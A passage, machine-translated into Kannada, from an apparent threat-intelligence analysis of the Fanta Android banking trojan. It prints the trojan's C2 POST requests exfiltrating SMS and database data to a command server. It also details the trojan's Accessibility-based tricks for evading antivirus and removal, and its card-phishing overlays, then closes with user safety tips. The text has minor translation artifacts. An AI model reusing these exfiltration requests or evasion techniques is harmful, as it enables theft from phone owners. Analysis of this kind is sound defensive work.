  • ಪ್ರಕಾರದೊಂದಿಗೆ ಸಂದೇಶವನ್ನು ಕಳುಹಿಸಲಾಗುತ್ತಿದೆ setSmsStatus. ಆಜ್ಞೆಯನ್ನು ಕಾರ್ಯಗತಗೊಳಿಸಿದ ನಂತರ ಈ ವಿನಂತಿಯನ್ನು ಮಾಡಲಾಗುತ್ತದೆ SMS ಸಂದೇಶವನ್ನು ಕಳುಹಿಸಿ. ವಿನಂತಿಯು ಈ ರೀತಿ ಕಾಣುತ್ತದೆ:

POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=setSmsStatus&id=<%ID%>&status_sms=<%PWD%>

  • ಡೇಟಾಬೇಸ್ ವಿಷಯಗಳನ್ನು ಅಪ್‌ಲೋಡ್ ಮಾಡಲಾಗುತ್ತಿದೆ. ಪ್ರತಿ ವಿನಂತಿಗೆ ಒಂದು ಸಾಲನ್ನು ರವಾನಿಸಲಾಗುತ್ತದೆ. ಕೆಳಗಿನ ಡೇಟಾವನ್ನು ಸರ್ವರ್‌ಗೆ ಕಳುಹಿಸಲಾಗಿದೆ:
    · ಕುಕಿ - ಸರ್ವರ್‌ನಿಂದ ಪಡೆದ ಕುಕೀಗಳು
    · ಕ್ರಮದಲ್ಲಿ - ಸ್ಟ್ರಿಂಗ್ ಸ್ಥಿರ setSaveInboxSms
    · ಬಿಡ್ - ವಿನಂತಿಯನ್ನು ಕಳುಹಿಸುವಾಗ ಸ್ವೀಕರಿಸಿದ ಸೋಂಕಿತ ಸಾಧನದ ಐಡಿ ನೋಂದಣಿ_ಬೋಟ್
    · ಪಠ್ಯ - ಪ್ರಸ್ತುತ ಡೇಟಾಬೇಸ್ ದಾಖಲೆಯಲ್ಲಿ ಪಠ್ಯ (ಕ್ಷೇತ್ರ d ಮೇಜಿನಿಂದ ದಾಖಲೆಗಳು ಡೇಟಾಬೇಸ್‌ನಲ್ಲಿ а)
    · ಸಂಖ್ಯೆ - ಪ್ರಸ್ತುತ ಡೇಟಾಬೇಸ್ ದಾಖಲೆಯ ಹೆಸರು (ಕ್ಷೇತ್ರ p ಮೇಜಿನಿಂದ ದಾಖಲೆಗಳು ಡೇಟಾಬೇಸ್‌ನಲ್ಲಿ а)
    · sms_mode - ಪೂರ್ಣಾಂಕ ಮೌಲ್ಯ (ಕ್ಷೇತ್ರ m ಮೇಜಿನಿಂದ ದಾಖಲೆಗಳು ಡೇಟಾಬೇಸ್‌ನಲ್ಲಿ а)

    ವಿನಂತಿಯು ಈ ರೀತಿ ಕಾಣುತ್ತದೆ:

    POST /controller.php HTTP/1.1
    Cookie:
    Content-Type: application/x-www-form-urlencoded
    Host: onuseseddohap.club
    Connection: close
    Accept-Encoding: gzip, deflate
    User-Agent: okhttp/3.6.0
    
    mode=setSaveInboxSms&bid=<%APP_ID%>&text=<%a.logs.d%>&number=<%a.logs.p%>&sms_mode=<%a.logs.m%>

    ಸರ್ವರ್‌ಗೆ ಯಶಸ್ವಿಯಾಗಿ ಕಳುಹಿಸಿದರೆ, ಸಾಲನ್ನು ಟೇಬಲ್‌ನಿಂದ ಅಳಿಸಲಾಗುತ್ತದೆ. ಸರ್ವರ್‌ನಿಂದ ಹಿಂತಿರುಗಿಸಿದ JSON ವಸ್ತುವಿನ ಉದಾಹರಣೆ:

    {
        "response":[],
        "status":"ok"
    }

ಪ್ರವೇಶಿಸುವಿಕೆ ಸೇವೆಯೊಂದಿಗೆ ಸಂವಹನ

ವಿಕಲಚೇತನರಿಗೆ Android ಸಾಧನಗಳನ್ನು ಬಳಸಲು ಸುಲಭವಾಗಿಸಲು ಪ್ರವೇಶಿಸುವಿಕೆ ಸೇವೆಯನ್ನು ಅಳವಡಿಸಲಾಗಿದೆ. ಹೆಚ್ಚಿನ ಸಂದರ್ಭಗಳಲ್ಲಿ, ಅಪ್ಲಿಕೇಶನ್‌ನೊಂದಿಗೆ ಸಂವಹನ ನಡೆಸಲು ದೈಹಿಕ ಸಂವಹನದ ಅಗತ್ಯವಿದೆ. ಪ್ರವೇಶಿಸುವಿಕೆ ಸೇವೆಯು ಅವುಗಳನ್ನು ಪ್ರೋಗ್ರಾಮಿಕ್ ಆಗಿ ಮಾಡಲು ನಿಮಗೆ ಅನುಮತಿಸುತ್ತದೆ. ಬ್ಯಾಂಕಿಂಗ್ ಅಪ್ಲಿಕೇಶನ್‌ಗಳಲ್ಲಿ ನಕಲಿ ವಿಂಡೋಗಳನ್ನು ರಚಿಸಲು ಮತ್ತು ಸಿಸ್ಟಮ್ ಸೆಟ್ಟಿಂಗ್‌ಗಳು ಮತ್ತು ಕೆಲವು ಅಪ್ಲಿಕೇಶನ್‌ಗಳನ್ನು ತೆರೆಯುವುದರಿಂದ ಬಳಕೆದಾರರನ್ನು ತಡೆಯಲು Fanta ಸೇವೆಯನ್ನು ಬಳಸುತ್ತದೆ.

ಪ್ರವೇಶಿಸುವಿಕೆ ಸೇವೆಯ ಕಾರ್ಯವನ್ನು ಬಳಸಿಕೊಂಡು, ಸೋಂಕಿತ ಸಾಧನದ ಪರದೆಯ ಮೇಲಿನ ಅಂಶಗಳಿಗೆ ಟ್ರೋಜನ್ ಬದಲಾವಣೆಗಳನ್ನು ಮೇಲ್ವಿಚಾರಣೆ ಮಾಡುತ್ತದೆ. ಹಿಂದೆ ವಿವರಿಸಿದಂತೆ, ಫಾಂಟಾ ಸೆಟ್ಟಿಂಗ್‌ಗಳು ಡೈಲಾಗ್ ಬಾಕ್ಸ್‌ಗಳೊಂದಿಗೆ ಲಾಗಿಂಗ್ ಕಾರ್ಯಾಚರಣೆಗಳಿಗೆ ಜವಾಬ್ದಾರರಾಗಿರುವ ನಿಯತಾಂಕವನ್ನು ಒಳಗೊಂಡಿರುತ್ತವೆ - ಡೈಲಾಗ್ ಓದಿ. ಈ ಪ್ಯಾರಾಮೀಟರ್ ಅನ್ನು ಹೊಂದಿಸಿದರೆ, ಈವೆಂಟ್ ಅನ್ನು ಪ್ರಚೋದಿಸಿದ ಪ್ಯಾಕೇಜ್‌ನ ಹೆಸರು ಮತ್ತು ವಿವರಣೆಯ ಮಾಹಿತಿಯನ್ನು ಡೇಟಾಬೇಸ್‌ಗೆ ಸೇರಿಸಲಾಗುತ್ತದೆ. ಈವೆಂಟ್‌ಗಳನ್ನು ಪ್ರಚೋದಿಸಿದಾಗ ಟ್ರೋಜನ್ ಈ ಕೆಳಗಿನ ಕ್ರಿಯೆಗಳನ್ನು ಮಾಡುತ್ತದೆ:

  • ಕೆಳಗಿನ ಸಂದರ್ಭಗಳಲ್ಲಿ ಹಿಂಭಾಗ ಮತ್ತು ಹೋಮ್ ಕೀಗಳನ್ನು ಒತ್ತುವುದನ್ನು ಅನುಕರಿಸುತ್ತದೆ:
    · ಬಳಕೆದಾರನು ತನ್ನ ಸಾಧನವನ್ನು ರೀಬೂಟ್ ಮಾಡಲು ಬಯಸಿದರೆ
    · ಬಳಕೆದಾರರು "Avito" ಅಪ್ಲಿಕೇಶನ್ ಅನ್ನು ಅಳಿಸಲು ಅಥವಾ ಪ್ರವೇಶ ಹಕ್ಕುಗಳನ್ನು ಬದಲಾಯಿಸಲು ಬಯಸಿದರೆ
    · ಪುಟದಲ್ಲಿ "Avito" ಅಪ್ಲಿಕೇಶನ್‌ನ ಉಲ್ಲೇಖವಿದ್ದರೆ
    · Google Play Protect ಅಪ್ಲಿಕೇಶನ್ ಅನ್ನು ತೆರೆಯುವಾಗ
    · ಪ್ರವೇಶಿಸುವಿಕೆ ಸೇವೆ ಸೆಟ್ಟಿಂಗ್‌ಗಳೊಂದಿಗೆ ಪುಟಗಳನ್ನು ತೆರೆಯುವಾಗ
    · ಸಿಸ್ಟಮ್ ಸೆಕ್ಯುರಿಟಿ ಡೈಲಾಗ್ ಬಾಕ್ಸ್ ಕಾಣಿಸಿಕೊಂಡಾಗ
    · "ಇತರ ಅಪ್ಲಿಕೇಶನ್‌ನ ಮೇಲೆ ಎಳೆಯಿರಿ" ಸೆಟ್ಟಿಂಗ್‌ಗಳೊಂದಿಗೆ ಪುಟವನ್ನು ತೆರೆಯುವಾಗ
    · "ಅಪ್ಲಿಕೇಶನ್‌ಗಳು" ಪುಟವನ್ನು ತೆರೆಯುವಾಗ, "ಚೇತರಿಕೆ ಮತ್ತು ಮರುಹೊಂದಿಸಿ", "ಡೇಟಾ ಮರುಹೊಂದಿಸಿ", "ಸೆಟ್ಟಿಂಗ್‌ಗಳನ್ನು ಮರುಹೊಂದಿಸಿ", "ಡೆವಲಪರ್ ಪ್ಯಾನಲ್", "ವಿಶೇಷ. ಅವಕಾಶಗಳು", "ವಿಶೇಷ ಅವಕಾಶಗಳು", "ವಿಶೇಷ ಹಕ್ಕುಗಳು"
    · ಕೆಲವು ಅಪ್ಲಿಕೇಶನ್‌ಗಳಿಂದ ಈವೆಂಟ್ ಅನ್ನು ರಚಿಸಿದ್ದರೆ.

    ಅಪ್ಲಿಕೇಶನ್‌ಗಳ ಪಟ್ಟಿ

    • ಯಂತ್ರಮಾನವ
    • ಮಾಸ್ಟರ್ ಲೈಟ್
    • ಕ್ಲೀನ್ ಮಾಸ್ಟರ್
    • x86 CPU ಗಾಗಿ ಕ್ಲೀನ್ ಮಾಸ್ಟರ್
    • Meizu ಅಪ್ಲಿಕೇಶನ್ ಅನುಮತಿ ನಿರ್ವಹಣೆ
    • MIUI ಭದ್ರತೆ
    • ಕ್ಲೀನ್ ಮಾಸ್ಟರ್ - ಆಂಟಿವೈರಸ್ & ಕ್ಯಾಶ್ ಮತ್ತು ಗಾರ್ಬೇಜ್ ಕ್ಲೀನರ್
    • ಪೋಷಕರ ನಿಯಂತ್ರಣಗಳು ಮತ್ತು GPS: ಕ್ಯಾಸ್ಪರ್ಸ್ಕಿ ಸೇಫ್ಕಿಡ್ಸ್
    • ಕ್ಯಾಸ್ಪರ್ಸ್ಕಿ ಆಂಟಿವೈರಸ್ ಆಪ್‌ಲಾಕ್ ಮತ್ತು ವೆಬ್ ಸೆಕ್ಯುರಿಟಿ ಬೀಟಾ
    • ವೈರಸ್ ಕ್ಲೀನರ್, ಆಂಟಿವೈರಸ್, ಕ್ಲೀನರ್ (MAX ಭದ್ರತೆ)
    • ಮೊಬೈಲ್ ಆಂಟಿವೈರಸ್ ಭದ್ರತಾ PRO
    • ಅವಾಸ್ಟ್ ಆಂಟಿವೈರಸ್ ಮತ್ತು ಉಚಿತ ರಕ್ಷಣೆ 2019
    • ಮೊಬೈಲ್ ಭದ್ರತೆ MegaFon
    • Xperia ಗಾಗಿ AVG ರಕ್ಷಣೆ
    • ಮೊಬೈಲ್ ಭದ್ರತೆ
    • Malwarebytes ಆಂಟಿವೈರಸ್ ಮತ್ತು ರಕ್ಷಣೆ
    • Android 2019 ಗಾಗಿ ಆಂಟಿವೈರಸ್
    • ಸೆಕ್ಯುರಿಟಿ ಮಾಸ್ಟರ್ - ಆಂಟಿವೈರಸ್, ವಿಪಿಎನ್, ಆಪ್‌ಲಾಕ್, ಬೂಸ್ಟರ್
    • Huawei ಟ್ಯಾಬ್ಲೆಟ್ ಸಿಸ್ಟಮ್ ಮ್ಯಾನೇಜರ್‌ಗಾಗಿ AVG ಆಂಟಿವೈರಸ್
    • Samsung ಪ್ರವೇಶಿಸುವಿಕೆ
    • ಸ್ಯಾಮ್ಸಂಗ್ ಸ್ಮಾರ್ಟ್ ಮ್ಯಾನೇಜರ್
    • ಸೆಕ್ಯುರಿಟಿ ಮಾಸ್ಟರ್
    • ಸ್ಪೀಡ್ ಬೂಸ್ಟರ್
    • ಡಾ.ವೆಬ್
    • ಡಾ.ವೆಬ್ ಸೆಕ್ಯುರಿಟಿ ಸ್ಪೇಸ್
    • ಡಾ.ವೆಬ್ ಮೊಬೈಲ್ ನಿಯಂತ್ರಣ ಕೇಂದ್ರ
    • ಡಾ.ವೆಬ್ ಸೆಕ್ಯುರಿಟಿ ಸ್ಪೇಸ್ ಲೈಫ್
    • ಡಾ.ವೆಬ್ ಮೊಬೈಲ್ ನಿಯಂತ್ರಣ ಕೇಂದ್ರ
    • ಆಂಟಿವೈರಸ್ ಮತ್ತು ಮೊಬೈಲ್ ಭದ್ರತೆ
    • ಕ್ಯಾಸ್ಪರ್ಸ್ಕಿ ಇಂಟರ್ನೆಟ್ ಭದ್ರತೆ: ಆಂಟಿವೈರಸ್ ಮತ್ತು ರಕ್ಷಣೆ
    • ಕ್ಯಾಸ್ಪರ್ಸ್ಕಿ ಬ್ಯಾಟರಿ ಬಾಳಿಕೆ: ಸೇವರ್ ಮತ್ತು ಬೂಸ್ಟರ್
    • ಕ್ಯಾಸ್ಪರ್ಸ್ಕಿ ಎಂಡ್‌ಪಾಯಿಂಟ್ ಸೆಕ್ಯುರಿಟಿ - ರಕ್ಷಣೆ ಮತ್ತು ನಿರ್ವಹಣೆ
    • AVG ಆಂಟಿವೈರಸ್ ಉಚಿತ 2019 - Android ಗಾಗಿ ರಕ್ಷಣೆ
    • ಆಂಟಿವೈರಸ್ ಆಂಡ್ರಾಯ್ಡ್
    • ನಾರ್ಟನ್ ಮೊಬೈಲ್ ಭದ್ರತೆ ಮತ್ತು ಆಂಟಿವೈರಸ್
    • ಆಂಟಿವೈರಸ್, ಫೈರ್ವಾಲ್, ವಿಪಿಎನ್, ಮೊಬೈಲ್ ಭದ್ರತೆ
    • ಮೊಬೈಲ್ ಭದ್ರತೆ: ಆಂಟಿವೈರಸ್, ವಿಪಿಎನ್, ಕಳ್ಳತನ ರಕ್ಷಣೆ
    • Android ಗಾಗಿ ಆಂಟಿವೈರಸ್

  • ಚಿಕ್ಕ ಸಂಖ್ಯೆಗೆ SMS ಸಂದೇಶವನ್ನು ಕಳುಹಿಸುವಾಗ ಅನುಮತಿಯನ್ನು ಕೋರಿದರೆ, ಚೆಕ್‌ಬಾಕ್ಸ್‌ನಲ್ಲಿ ಕ್ಲಿಕ್ ಮಾಡುವುದನ್ನು ಫ್ಯಾಂಟಾ ಅನುಕರಿಸುತ್ತದೆ ಆಯ್ಕೆಯನ್ನು ನೆನಪಿಡಿ ಮತ್ತು ಬಟನ್ ಕಳುಹಿಸಲು.
  • ನೀವು ಟ್ರೋಜನ್‌ನಿಂದ ನಿರ್ವಾಹಕರ ಹಕ್ಕುಗಳನ್ನು ಕಸಿದುಕೊಳ್ಳಲು ಪ್ರಯತ್ನಿಸಿದಾಗ, ಅದು ಫೋನ್ ಪರದೆಯನ್ನು ಲಾಕ್ ಮಾಡುತ್ತದೆ.
  • ಹೊಸ ನಿರ್ವಾಹಕರನ್ನು ಸೇರಿಸುವುದನ್ನು ತಡೆಯುತ್ತದೆ.
  • ಆಂಟಿವೈರಸ್ ಅಪ್ಲಿಕೇಶನ್ ವೇಳೆ dr.web ಬೆದರಿಕೆಯನ್ನು ಪತ್ತೆಹಚ್ಚಲಾಗಿದೆ, ಫಾಂಟಾ ಗುಂಡಿಯನ್ನು ಒತ್ತುವುದನ್ನು ಅನುಕರಿಸುತ್ತದೆ ನಿರ್ಲಕ್ಷಿಸಿ.
  • ಈವೆಂಟ್ ಅನ್ನು ಅಪ್ಲಿಕೇಶನ್‌ನಿಂದ ರಚಿಸಿದ್ದರೆ ಟ್ರೋಜನ್ ಬ್ಯಾಕ್ ಮತ್ತು ಹೋಮ್ ಬಟನ್ ಅನ್ನು ಒತ್ತುವುದನ್ನು ಅನುಕರಿಸುತ್ತದೆ Samsung ಸಾಧನ ಆರೈಕೆ.
  • ಸುಮಾರು 30 ವಿವಿಧ ಇಂಟರ್ನೆಟ್ ಸೇವೆಗಳ ಪಟ್ಟಿಯಿಂದ ಅಪ್ಲಿಕೇಶನ್ ಅನ್ನು ಪ್ರಾರಂಭಿಸಿದರೆ ಬ್ಯಾಂಕ್ ಕಾರ್ಡ್‌ಗಳ ಬಗ್ಗೆ ಮಾಹಿತಿಯನ್ನು ನಮೂದಿಸಲು ಫಾಂಟಾ ಫಿಶಿಂಗ್ ವಿಂಡೋಗಳನ್ನು ಫಾರ್ಮ್‌ಗಳೊಂದಿಗೆ ರಚಿಸುತ್ತದೆ. ಅವುಗಳಲ್ಲಿ: ಅಲೈಕ್ಸ್ಪ್ರೆಸ್, ಬುಕಿಂಗ್, ಅವಿಟೊ, ಗೂಗಲ್ ಪ್ಲೇ ಮಾರ್ಕೆಟ್ ಕಾಂಪೊನೆಂಟ್, ಪಾಂಡಾವೋ, ಡ್ರೋಮ್ ಆಟೋ, ಇತ್ಯಾದಿ.

    ಫಿಶಿಂಗ್ ರೂಪಗಳು

    ಸೋಂಕಿತ ಸಾಧನದಲ್ಲಿ ಯಾವ ಅಪ್ಲಿಕೇಶನ್‌ಗಳು ರನ್ ಆಗುತ್ತಿವೆ ಎಂಬುದನ್ನು ಫಾಂಟಾ ವಿಶ್ಲೇಷಿಸುತ್ತದೆ. ಆಸಕ್ತಿಯ ಅಪ್ಲಿಕೇಶನ್ ತೆರೆದರೆ, ಟ್ರೋಜನ್ ಎಲ್ಲಾ ಇತರರ ಮೇಲೆ ಫಿಶಿಂಗ್ ವಿಂಡೋವನ್ನು ಪ್ರದರ್ಶಿಸುತ್ತದೆ, ಇದು ಬ್ಯಾಂಕ್ ಕಾರ್ಡ್ ಮಾಹಿತಿಯನ್ನು ನಮೂದಿಸುವ ಒಂದು ರೂಪವಾಗಿದೆ. ಬಳಕೆದಾರರು ಈ ಕೆಳಗಿನ ಡೇಟಾವನ್ನು ನಮೂದಿಸಬೇಕು:

    • Картомер .ы
    • ಕಾರ್ಡ್ ಮುಕ್ತಾಯ ದಿನಾಂಕ
    • ಸಿವಿವಿ
    • ಕಾರ್ಡ್‌ದಾರರ ಹೆಸರು (ಎಲ್ಲಾ ಬ್ಯಾಂಕ್‌ಗಳಿಗೆ ಅಲ್ಲ)

    ಚಾಲನೆಯಲ್ಲಿರುವ ಅಪ್ಲಿಕೇಶನ್ ಅನ್ನು ಅವಲಂಬಿಸಿ, ವಿಭಿನ್ನ ಫಿಶಿಂಗ್ ವಿಂಡೋಗಳನ್ನು ತೋರಿಸಲಾಗುತ್ತದೆ. ಅವುಗಳಲ್ಲಿ ಕೆಲವು ಉದಾಹರಣೆಗಳನ್ನು ಕೆಳಗೆ ನೀಡಲಾಗಿದೆ:

    ಅಲೈಕ್ಸ್ಪ್ರೆಸ್:

    ಲೇಸ್ಯಾ, ಫಾಂಟಾ: ಹಳೆಯ ಆಂಡ್ರಾಯ್ಡ್ ಟ್ರೋಜನ್‌ಗಾಗಿ ಹೊಸ ತಂತ್ರ
    ಅವಿತೊ:

    ಲೇಸ್ಯಾ, ಫಾಂಟಾ: ಹಳೆಯ ಆಂಡ್ರಾಯ್ಡ್ ಟ್ರೋಜನ್‌ಗಾಗಿ ಹೊಸ ತಂತ್ರ
    ಕೆಲವು ಇತರ ಅಪ್ಲಿಕೇಶನ್‌ಗಳಿಗೆ, ಉದಾ. Google Play Market, Aviasales, Pandao, Booking, Trivago:
    ಲೇಸ್ಯಾ, ಫಾಂಟಾ: ಹಳೆಯ ಆಂಡ್ರಾಯ್ಡ್ ಟ್ರೋಜನ್‌ಗಾಗಿ ಹೊಸ ತಂತ್ರ

    ಅದು ನಿಜವಾಗಿಯೂ ಹೇಗಿತ್ತು

    ಅದೃಷ್ಟವಶಾತ್, ಲೇಖನದ ಆರಂಭದಲ್ಲಿ ವಿವರಿಸಿದ SMS ಸಂದೇಶವನ್ನು ಸ್ವೀಕರಿಸಿದ ವ್ಯಕ್ತಿಯು ಸೈಬರ್ ಭದ್ರತಾ ತಜ್ಞರಾಗಿ ಹೊರಹೊಮ್ಮಿದರು. ಆದ್ದರಿಂದ, ನೈಜ, ನಿರ್ದೇಶಕರಲ್ಲದ ಆವೃತ್ತಿಯು ಮೊದಲೇ ಹೇಳಿದ್ದಕ್ಕಿಂತ ಭಿನ್ನವಾಗಿದೆ: ಒಬ್ಬ ವ್ಯಕ್ತಿಯು ಆಸಕ್ತಿದಾಯಕ SMS ಅನ್ನು ಸ್ವೀಕರಿಸಿದನು, ನಂತರ ಅವನು ಅದನ್ನು ಗುಂಪು-IB ಥ್ರೆಟ್ ಹಂಟಿಂಗ್ ಇಂಟೆಲಿಜೆನ್ಸ್ ತಂಡಕ್ಕೆ ನೀಡಿದನು. ದಾಳಿಯ ಫಲಿತಾಂಶ ಈ ಲೇಖನ. ಸುಖಾಂತ್ಯ, ಸರಿ? ಆದಾಗ್ಯೂ, ಎಲ್ಲಾ ಕಥೆಗಳು ಅಷ್ಟು ಯಶಸ್ವಿಯಾಗಿ ಕೊನೆಗೊಳ್ಳುವುದಿಲ್ಲ, ಮತ್ತು ನಿಮ್ಮದು ಹಣದ ನಷ್ಟದೊಂದಿಗೆ ನಿರ್ದೇಶಕರ ಕಟ್‌ನಂತೆ ಕಾಣುವುದಿಲ್ಲ, ಹೆಚ್ಚಿನ ಸಂದರ್ಭಗಳಲ್ಲಿ ಈ ಕೆಳಗಿನ ದೀರ್ಘ-ವಿವರಿಸಿದ ನಿಯಮಗಳಿಗೆ ಬದ್ಧವಾಗಿರಲು ಸಾಕು:

    • Google Play ಹೊರತುಪಡಿಸಿ ಯಾವುದೇ ಮೂಲಗಳಿಂದ Android OS ನೊಂದಿಗೆ ಮೊಬೈಲ್ ಸಾಧನಕ್ಕಾಗಿ ಅಪ್ಲಿಕೇಶನ್‌ಗಳನ್ನು ಸ್ಥಾಪಿಸಬೇಡಿ
    • ಅಪ್ಲಿಕೇಶನ್ ಅನ್ನು ಸ್ಥಾಪಿಸುವಾಗ, ಅಪ್ಲಿಕೇಶನ್ ವಿನಂತಿಸಿದ ಹಕ್ಕುಗಳಿಗೆ ವಿಶೇಷ ಗಮನ ಕೊಡಿ
    • ಡೌನ್‌ಲೋಡ್ ಮಾಡಿದ ಫೈಲ್‌ಗಳ ವಿಸ್ತರಣೆಗಳಿಗೆ ಗಮನ ಕೊಡಿ
    • ನಿಯಮಿತವಾಗಿ Android OS ನವೀಕರಣಗಳನ್ನು ಸ್ಥಾಪಿಸಿ
    • ಅನುಮಾನಾಸ್ಪದ ಸಂಪನ್ಮೂಲಗಳಿಗೆ ಭೇಟಿ ನೀಡಬೇಡಿ ಮತ್ತು ಅಲ್ಲಿಂದ ಫೈಲ್‌ಗಳನ್ನು ಡೌನ್‌ಲೋಡ್ ಮಾಡಬೇಡಿ
    • SMS ಸಂದೇಶಗಳಲ್ಲಿ ಸ್ವೀಕರಿಸಿದ ಲಿಂಕ್‌ಗಳನ್ನು ಕ್ಲಿಕ್ ಮಾಡಬೇಡಿ.

ಮೂಲ: www.habr.com

ಕಾಮೆಂಟ್ ಅನ್ನು ಸೇರಿಸಿ